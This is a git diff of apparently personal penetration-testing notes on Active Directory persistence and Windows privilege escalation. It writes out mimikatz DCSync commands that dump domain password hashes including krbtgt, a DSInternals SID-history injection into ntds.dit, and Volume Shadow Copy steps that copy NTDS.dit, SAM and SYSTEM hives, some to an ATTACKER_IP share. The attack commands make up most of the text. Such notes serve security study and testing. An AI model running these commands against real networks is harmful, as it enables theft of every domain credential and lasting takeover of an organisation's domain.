even more info

Cryptography/Active Directory/AD Persistance.md

@@ -1,6 +1,5 @@
 # Active Directory Persistance
 
-
 ## Using Credentials
 
 * __Knowledge Consistency Checker (KCC)__ replicates credentials through the forest
@@ -11,15 +10,20 @@
 
 ### Usage
 
-* Use mimikatz
+Use mimikatz
+
 ```sh
 lsadump::dcsync /domain:<domain> /user:<username>
 ```
-* To query the krbtgt user
+
+To query the krbtgt user
+
 ```sh
 lsadump::dcsync /domain:<domain> /user:krbtgt.<domain>
 ```
-* Query everything
+
+Query everything
+
 ```sh
 lsadump::dcsync /domain:<domain> /all
 ```
@@ -95,7 +99,9 @@ Get-ADUser <your ad username> -properties sidhistory,memberof
 ```sh
 Get-ADGroup "Domain Admins"
 ```
-* Use [DSInternals](https://github.com/MichaelGrafnetter/DSInternals) to patch `ntds.dit`
+
+Use [DSInternals](https://github.com/MichaelGrafnetter/DSInternals) to patch `ntds.dit`
+
 ```sh
 Stop-Service -Name ntds -force
 Add-ADDBSidHistory -SamAccountName 'username of our low-priveleged AD account' -SidHistory 'SID to add to SID History' -DatabasePath C:\Windows\NTDS\ntds.dit

Post Exploitation/Windows/Windows PrivEsc.md

@@ -337,6 +337,17 @@ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam
 copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \\ATTACKER_IP\
 ```
 
+#### In case you are on a DC
+
+You can extract the AD database which stores every domain account and its password hash via Volume Shadow Copy Service. `NTDS.dit` is stored at `C:\Windows\NTDS\ntdis.dit`.
+
+```sh
+vssadmin create shadow /for=C:
+copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\TEMP\ntds.dit
+copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\TEMP\system
+vssadmin delete shadows /shadow={$SHADOW_ID} /quiet
+```
+
 ### Dump LSASS
 
 LSASS contains multiple different credential types like NTLM password hashes,